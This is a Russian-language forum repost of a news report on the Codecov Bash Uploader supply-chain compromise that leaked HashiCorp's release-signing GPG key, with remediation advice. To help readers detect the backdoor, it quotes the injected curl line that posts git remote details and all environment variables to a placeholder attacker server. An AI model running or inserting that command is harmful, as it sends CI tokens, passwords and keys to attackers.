Внедрение вредоносного кода в скрипт Codecov привело к компрометации PGP-ключа HashiCorp
Автор
Сообщение
news_bot ®
Стаж: 6 лет 3 месяца
Сообщений: 27286
Компания HashiCorp, известная разработкой открытых инструментариев Vagrant, Packer, Nomad и Terraform, объявила об утечке закрытого GPG-ключа, используемого для создания цифровых подписей, верифицирующих релизы. Атакующие, получившие доступ к GPG-ключу, потенциально могли внести скрытые изменения в продукты HashiCorp, заверив их корректной цифровой подписью. При этом компания заявила, что в ходе проведённого аудита следов попыток внесения подобных модификаций не выявлено.
В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig, и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode).
Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (codecov-bash), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников.
Для взлома атакующие воспользовались ошибкой в процессе создания Docker-образа Codecov, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub.
Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также же поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-сервера-атакующих>/upload/v2 || true
===========
Источник:
OpenNet.RU
===========
Похожие новости
- Главная ссылка к новости (https://discuss.hashicorp.com/...)
- OpenNews: Red Hat и Google представили Sigstore, сервис для криптографической верификации кода
- OpenNews: Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний
- OpenNews: Атаковавшие SolarWinds смогли получить доступ к коду Microsoft
- OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
- OpenNews: Уязвимость в прошивках BMC-контроллеров, затрагивающая серверы многих производителей
Похожие новости:
- [Информационная безопасность] Security Week 16: атака на цепочку поставок в компании Codecov
- [Информационная безопасность, PHP] Пресечена попытка встроить бэкдор в репозиторий PHP
- Бэкдор в маршрутизаторах FiberHome
- Бэкдор в межсетевых экранах и точках доступа Zyxel
- В репозитории NPM выявлен вредоносный пакет twilio-npm
- [Антивирусная защита, Информационная безопасность] В продуктах GeoVision больше полугода сохраняются критические уязвимости
- [Информационная безопасность, Настройка Linux, Разработка для интернета вещей, Разработка под Linux] Как дочка Ростех-а, продавшая десятки тысяч камер в школы, делает «российские» камеры, c дырявой китайской прошивкой
- Результаты анализа бэкдоров в приложениях для Android
- [Информационная безопасность] Security Week 11: вредоносное ПО в поисковой выдаче
- [Python, Программирование, ВКонтакте API, Социальные сети и сообщества] Обходим запрет messages API Вконтакте через Python
Теги для поиска: #_codecov, #_backdoor, #_supplychain
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Май 01:48
Часовой пояс: UTC + 5
| Автор | Сообщение |
|---|---|
|
news_bot ®
Стаж: 6 лет 3 месяца |
|
|
Компания HashiCorp, известная разработкой открытых инструментариев Vagrant, Packer, Nomad и Terraform, объявила об утечке закрытого GPG-ключа, используемого для создания цифровых подписей, верифицирующих релизы. Атакующие, получившие доступ к GPG-ключу, потенциально могли внести скрытые изменения в продукты HashiCorp, заверив их корректной цифровой подписью. При этом компания заявила, что в ходе проведённого аудита следов попыток внесения подобных модификаций не выявлено. В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig, и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode). Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (codecov-bash), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников. Для взлома атакующие воспользовались ошибкой в процессе создания Docker-образа Codecov, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub. Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также же поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-сервера-атакующих>/upload/v2 || true
=========== Источник: OpenNet.RU =========== Похожие новости
|
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Май 01:48
Часовой пояс: UTC + 5